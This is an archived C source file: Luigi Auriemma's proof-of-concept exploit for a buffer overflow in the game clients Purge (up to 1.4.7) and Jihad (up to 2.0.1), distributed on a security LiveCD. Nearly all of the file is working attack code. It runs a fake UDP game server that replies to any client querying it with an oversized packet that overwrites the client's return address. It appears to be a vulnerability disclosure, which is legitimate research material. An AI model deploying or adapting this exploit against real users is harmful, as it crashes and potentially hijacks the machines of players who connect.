home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / purge / purge-cbof.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  4KB  |  158 lines

---

1. /*
2.  
3. by Luigi Auriemma
4.  
5. UNIX & WIN VERSION
6. */
7.  
8.  
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <string.h>
12.  
13. #ifdef WIN32
14.     #include <winsock.h>
15.     #include "winerr.h"
16.  
17.     #define close   closesocket
18. #else
19.     #include <unistd.h>
20.     #include <sys/socket.h>
21.     #include <sys/types.h>
22.     #include <arpa/inet.h>
23.     #include <netdb.h>
24. #endif
25.  
26.  
27.  
28.  
29. #define VER     "0.1"
30. #define BUFFSZ  2048
31. #define PORT    27777
32. #define PCK     "EYE1" \
33.                 "\x06" "purge" \
34.                 "\x06" "27777" \
35.                 "\x0a" "destroyer" \
36.                 "\xff" \
37.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
38.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
39.                 "\xde\xc0\xad\xde"      /* return address */ \
40.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
41.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
42.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
43.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
44.                 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
45.                 "aaaaaaaaaaaaaaaaaaaaaaaaaa" \
46.                 "\x0e" "steel chamber"  /* also this is vulnerable */ \
47.                 "\x06" "2.0.0" \
48.                 "\x02" "0" \
49.                 "\x02" "0" \
50.                 "\x03" "20" \
51.                 "\x04" "ded" \
52.                 "\x02" "1" \
53.                 "\x0b" "maxclients" \
54.                 "\x03" "20" \
55.                 "\x05" "time" \
56.                 "\x05" "1800" \
57.                 "\x07" "rounds" \
58.                 "\x02" "3" \
59.                 "\x03" "ff" \
60.                 "\x02" "1" \
61.                 "\x0b" "lamerguard" \
62.                 "\x02" "1" \
63.                 "\x09" "deadtalk" \
64.                 "\x02" "1" \
65.                 "\x06" "lives" \
66.                 "\x04" "200" \
67.                 "\x07" "portal" \
68.                 "\x02" "2" \
69.                 "\x08" "persist" \
70.                 "\x02" "1" \
71.                 "\x09" "maxlevel" \
72.                 "\x03" "21" \
73.                 "\x09" "minlevel" \
74.                 "\x02" "1" \
75.                 "\x06" "altar" \
76.                 "\x02" "1" \
77.                 "\x01"
78.  
79.  
80.  
81.  
82. void std_err(void);
83.  
84.  
85.  
86.  
87. int main(int argc, char *argv[]) {
88.     int         sd,
89.                 err,
90.                 on = 1,
91.                 psz;
92.     struct  sockaddr_in peer;
93.     u_char      *buff;
94.  
95.  
96.     setbuf(stdout, NULL);
97.  
98.     fputs("\n"
99.         "Purge <= 1.4.7 and Jihad <= 2.0.1 broadcast client's buffer overflow "VER"\n"
100.         "by Luigi Auriemma\n"
101.         "e-mail: aluigi@altervista.org\n"
102.         "web:    http://aluigi.altervista.org\n"
103.         "\n"
104.         "Return address will be overwritten by 0xdeadc0de\n"
105.         "\n", stdout);
106.  
107. #ifdef WIN32
108.     WSADATA    wsadata;
109.     WSAStartup(MAKEWORD(1,0), &wsadata);
110. #endif
111.  
112.     peer.sin_addr.s_addr = INADDR_ANY;
113.     peer.sin_port        = htons(PORT);
114.     peer.sin_family      = AF_INET;
115.     psz                  = sizeof(peer);
116.  
117.     printf("\nBinding UDP port %u\n", PORT);
118.  
119.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
120.     if(sd < 0) std_err();
121.  
122.     err = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));
123.     if(err < 0) std_err();
124.     err = bind(sd, (struct sockaddr *)&peer, psz);
125.     if(err < 0) std_err();
126.  
127.     buff = malloc(BUFFSZ);
128.     if(!buff) std_err();
129.  
130.     fputs("\nClients:\n", stdout);
131.     while(1) {
132.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
133.         if(err < 0) std_err();
134.  
135.         printf("  %s:%hu\n", inet_ntoa(peer.sin_addr), htons(peer.sin_port));
136.  
137.         err = sendto(sd, PCK, sizeof(PCK) - 1, 0, (struct sockaddr *)&peer, psz);
138.         if(err < 0) std_err();
139.     }
140.     close(sd);
141.  
142.     return(0);
143. }
144.  
145.  
146.  
147.  
148.  
149. #ifndef WIN32
150.     void std_err(void) {
151.         perror("\nError");
152.         exit(1);
153.     }
154. #endif
155.  
156.  
157.  
158.